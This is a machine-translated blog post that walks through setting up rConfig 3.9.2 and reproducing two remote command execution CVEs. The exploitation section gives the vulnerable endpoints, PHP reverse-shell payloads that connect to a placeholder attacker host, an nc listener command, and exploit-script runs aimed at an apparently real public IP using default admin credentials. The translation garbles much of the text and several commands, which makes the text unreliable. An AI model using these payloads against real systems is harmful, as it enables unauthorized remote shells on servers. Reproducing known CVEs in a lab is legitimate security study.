Shulou(Shulou.com)06/01 Report--

Today, I will talk to you about how to reproduce rConfig-CVE loopholes and build the environment. Many people may not know much about it. In order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

RConfig is an open source network device configuration management utility that network engineers can use to frequently take snapshots of the configuration of their network devices. RConfig is unique because you select the command to run against the device.

Simply configure rConfig with the list of commands you want to apply to the device category, and then add the device to that category. Create a scheduled task and the rest is done by rConfig. RConfig version 3 now has a configuration compliance management utility that allows you to monitor device configurations for policy compliance.

I. Environmental construction

RConfig installation

Cd / home

Curl-O https://www.rconfig.com/downloads/scripts/install_rConfig.sh-A "Mozilla"

Chmod + x install_rConfig.sh

. / install_rConfig.sh

Run the file installation and found an error. Let's open the source code to see why it can't be connected.

It turns out that curl will visit Google to determine whether there is a network we can directly change to www.baidu.com, but the later installation may just ask about the connection of the quilt wall, so just to be on the safe side, hang an agent! What I use here is a ss of my intranet that is represented by proxychains4.

Then you can install it normally.

There will be a centos7_postReboot.sh file after the installation is complete

After running it, we can see that the installation is complete. The rest will be configured on the web page.

Go to the https://192.168.157.130/install page for subsequent installation

So far, the installation has been completed, and the default account password is admin admin.

Second, the recurrence of loopholes

An unauthenticated command execution vulnerability in rConfig 3.9.2 and earlier. After installation, the installation directory is not automatically deleted, which allows unauthenticated users to execute arbitrary commands as Web server users through the ajaxServerSettingsChk.php file.

CVE-2019-16662 rConfig3.9.2 remote command execution vulnerability recurrence:

In order to be intuitive, I have built a rConfig3.9.2 system on the server. Now let's capture the package and reproduce the vulnerability.

We replace the path with a leaky / install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=

Next we need to execute a url code for the command and then fill in the parameters.

Now that we have output our echo, let's play a shell and try it.

Encode url; php-r'$sock=fsockopen ("XX.XX.XX.XX", 6633); exec ("/ bin/sh-I & 3 2 > & 3");'#

Another public network server listens to nc-lvnp 6633

By adding parameters to send the request, you can see that it has bounced back to shell.

The CVE-2019-16662Exp script takes advantage of

Python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634

CVE-2019-16663 rConfig3.9.2 remote Command execution vulnerability recurrence

This RCE requires authentication to be executed and is stored in the lib/crud/search.crud.php file.

After successful login, grab the packet and replace it with the path of RCE to encode the payload of the bouncing shell.

& & php-r'$sock=fsockopen ("XX.XX.XX.XX", 6635); exec ("/ bin/sh-I & 3 2 > & 3");'#

Monitor, bounce, succeed

CVE-2019-16663 EXP utilization

Python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636

CVE-2019-19509 rConfig3.9.3 remote Command execution vulnerability

Due to the official deletion and removal of the 3.9.3 installation package, it cannot be reproduced now, but Exp is already available on the Internet.

After reading the above, do you have any further understanding of how to reproduce rConfig-CVE vulnerabilities and build the environment? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.